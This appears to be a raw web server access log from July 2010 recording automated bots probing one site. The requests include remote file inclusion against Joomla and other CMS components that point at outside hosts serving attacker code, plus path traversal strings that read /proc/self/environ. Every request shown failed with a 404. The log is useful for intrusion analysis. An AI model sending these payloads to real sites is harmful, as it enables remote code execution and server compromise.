194.19.251.181 - - [24/Jul/2010:03:11:35 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:11:36 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:11:36 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:11:36 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:11:37 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:11:37 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:11:37 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:11:38 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:11:40 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:11:41 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:03:11:42 -0700] "GET /logs/access_100327.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.tempat-respon-dan-spreader.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:03:12:56 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:03:12:56 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:03:12:56 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:03:12:56 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:03:12:56 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:03:12:57 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:03:12:57 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:03:12:57 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:03:12:57 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:03:12:57 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:03:12:57 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:03:12:57 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
208.100.55.39 - - [24/Jul/2010:03:14:41 -0700] "GET /logs/access_100529.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.getyourselfahorse.com"
208.100.55.39 - - [24/Jul/2010:03:14:42 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.getyourselfahorse.com"
208.100.55.39 - - [24/Jul/2010:03:14:42 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.831" "www.getyourselfahorse.com"
208.100.55.39 - - [24/Jul/2010:03:14:42 -0700] "GET /logs/access_100522.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.getyourselfahorse.com"
71.12.223.67 - - [24/Jul/2010:03:14:59 -0700] "GET /logs/access_100529.log//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.830" "www.getyourselfahorse.com"
71.12.223.67 - - [24/Jul/2010:03:14:59 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.830" "www.getyourselfahorse.com"
71.12.223.67 - - [24/Jul/2010:03:14:59 -0700] "GET /logs//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.830" "www.getyourselfahorse.com"
71.12.223.67 - - [24/Jul/2010:03:14:59 -0700] "GET /logs/access_100522.log//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.830" "www.getyourselfahorse.com"
77.78.97.82 - - [24/Jul/2010:03:15:16 -0700] "GET /logs/access_100327.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.getyourselfahorse.com"
77.78.97.82 - - [24/Jul/2010:03:15:16 -0700] "GET /logs/access_100227.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.getyourselfahorse.com"
77.78.97.82 - - [24/Jul/2010:03:15:16 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.getyourselfahorse.com"
77.78.97.82 - - [24/Jul/2010:03:15:16 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:03:15:45 -0700] "GET /logs/access_100501.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:03:15:45 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:03:15:45 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:03:18:05 -0700] "GET /logs/access_100515.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:19:16 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:19:16 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:19:16 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:19:17 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:19:17 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:19:17 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:19:18 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:19:18 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:19:18 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:19:19 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:19:19 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:19:22 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:03:21:10 -0700] "GET /logs/access_100501.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:03:21:10 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:03:21:10 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.78.118.123 - - [24/Jul/2010:03:21:44 -0700] "GET /index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
122.201.82.173 - - [24/Jul/2010:03:21:52 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.getyourselfahorse.com"
122.201.82.173 - - [24/Jul/2010:03:21:52 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.getyourselfahorse.com"
122.201.82.173 - - [24/Jul/2010:03:21:52 -0700] "GET /logs/access_100605.log//components/com_simpleboard/image_upload.php?sbp=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.getyourselfahorse.com"
122.201.82.173 - - [24/Jul/2010:03:22:12 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:03:22:26 -0700] "GET /logs/access_100508.log////skin/ggambo7002_board/comment_modify.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.78.118.123 - - [24/Jul/2010:03:22:29 -0700] "GET /index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
213.171.37.206 - - [24/Jul/2010:03:22:32 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
213.171.37.206 - - [24/Jul/2010:03:22:32 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:03:22:33 -0700] "GET /logs/access_100227.log////skin/ggambo7002_board/comment_modify.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
188.165.68.4 - - [24/Jul/2010:03:22:39 -0700] "GET /index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:03:23:04 -0700] "GET /logs/access_100515.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
67.205.67.73 - - [24/Jul/2010:03:24:36 -0700] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "getyourselfahorse.com"
67.205.67.73 - - [24/Jul/2010:03:24:36 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "getyourselfahorse.com"
213.171.37.206 - - [24/Jul/2010:03:25:13 -0700] "GET /logs/access_100313.log//components/com_simpleboard/image_upload.php?sbp=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
213.171.37.206 - - [24/Jul/2010:03:25:13 -0700] "GET /logs/access_100508.log//components/com_simpleboard/image_upload.php?sbp=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
122.201.82.173 - - [24/Jul/2010:03:25:18 -0700] "GET /logs/access_100522.log%20//components/com_simpleboard/image_upload.php?sbp=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.getyourselfahorse.com"
89.108.64.192 - - [24/Jul/2010:03:25:20 -0700] "GET /logs/access_100320.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.getyourselfahorse.com"
89.108.64.192 - - [24/Jul/2010:03:25:20 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.getyourselfahorse.com"
89.108.64.192 - - [24/Jul/2010:03:25:21 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.getyourselfahorse.com"
67.205.67.73 - - [24/Jul/2010:03:26:46 -0700] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "getyourselfahorse.com"
67.205.67.73 - - [24/Jul/2010:03:26:46 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:03:27:03 -0700] "GET /logs/access_100508.log////skin/ggambo7002_board/comment_modify.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.13.195.84 - - [24/Jul/2010:03:27:17 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
212.13.195.84 - - [24/Jul/2010:03:27:17 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
93.232.214.130 - - [24/Jul/2010:03:27:41 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://wjw.kr/.bash_history/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
93.232.214.130 - - [24/Jul/2010:03:27:41 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://wjw.kr/.bash_history/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
93.232.214.130 - - [24/Jul/2010:03:27:42 -0700] "GET /logs/access_100417.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://wjw.kr/.bash_history/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:03:27:52 -0700] "GET /logs/access_100227.log////skin/ggambo7002_board/comment_modify.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
93.232.214.130 - - [24/Jul/2010:03:28:03 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://wjw.kr/.bash_history/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
93.232.214.130 - - [24/Jul/2010:03:28:03 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://wjw.kr/.bash_history/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
93.232.214.130 - - [24/Jul/2010:03:28:03 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://wjw.kr/.bash_history/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
89.108.64.192 - - [24/Jul/2010:03:29:41 -0700] "GET /logs/access_100327.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.getyourselfahorse.com"
89.108.64.192 - - [24/Jul/2010:03:31:49 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.getyourselfahorse.com"
92.43.201.28 - - [24/Jul/2010:03:32:17 -0700] "POST /logs/e107 HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
92.43.201.28 - - [24/Jul/2010:03:32:17 -0700] "POST /e107 HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
92.43.201.28 - - [24/Jul/2010:03:32:17 -0700] "POST /logs/access.log/e107 HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
213.171.37.206 - - [24/Jul/2010:03:32:39 -0700] "GET /logs/access_100529.log//components/com_simpleboard/image_upload.php?sbp=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
188.165.68.4 - - [24/Jul/2010:03:33:37 -0700] "GET /logs/access_100619.log/index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
188.165.68.4 - - [24/Jul/2010:03:33:37 -0700] "GET /index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
188.165.68.4 - - [24/Jul/2010:03:33:37 -0700] "GET /logs/index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
79.244.120.116 - - [24/Jul/2010:03:35:09 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.susin.org/homepage/sub/a??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
79.244.120.116 - - [24/Jul/2010:03:35:09 -0700] "GET /logs/access_100227.log%20%20//skin/zero_vote/error.php?dir=http://www.susin.org/homepage/sub/a??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
79.244.120.116 - - [24/Jul/2010:03:35:09 -0700] "GET /skin/zero_vote/error.php?dir=http://www.susin.org/homepage/sub/a??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
188.165.68.4 - - [24/Jul/2010:03:35:50 -0700] "GET /logs/access_100626.log/index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
79.244.120.116 - - [24/Jul/2010:03:38:16 -0700] "GET /logs/access_100424.log%20%20//skin/zero_vote/error.php?dir=http://www.susin.org/homepage/sub/a??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
89.200.169.163 - - [24/Jul/2010:03:38:30 -0700] "GET /logs//index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "getyourselfahorse.com"
89.200.169.163 - - [24/Jul/2010:03:38:30 -0700] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "getyourselfahorse.com"
188.127.248.175 - - [24/Jul/2010:03:39:12 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "getyourselfahorse.com"
188.127.248.175 - - [24/Jul/2010:03:39:13 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "getyourselfahorse.com"
89.200.170.145 - - [24/Jul/2010:03:39:37 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "getyourselfahorse.com"
89.200.170.145 - - [24/Jul/2010:03:39:37 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "getyourselfahorse.com"
89.200.170.145 - - [24/Jul/2010:03:39:50 -0700] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "getyourselfahorse.com"
89.200.170.145 - - [24/Jul/2010:03:39:50 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:03:41:00 -0700] "GET /phphtml.php?htmlclass_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:03:41:00 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:03:41:00 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:41:21 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:41:21 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:41:22 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:41:22 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:41:22 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:41:22 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:41:23 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:41:23 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:41:24 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:41:25 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:41:25 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:03:41:26 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:03:42:30 -0700] "GET /logs/access_100612.log%20%20/phphtml.php?htmlclass_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:03:44:48 -0700] "GET /logs/access_100327.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:03:44:49 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:03:44:49 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:03:46:36 -0700] "GET /logs/access_100327.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:03:46:36 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:03:46:37 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
207.210.86.178 - - [24/Jul/2010:03:48:42 -0700] "GET /logs/access_100529.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://christr.com/images/myid.jpg? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:03:49:50 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:03:50:05 -0700] "GET /logs/access_100327.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://h1.ripway.com/plit/respon.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:03:50:05 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://h1.ripway.com/plit/respon.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
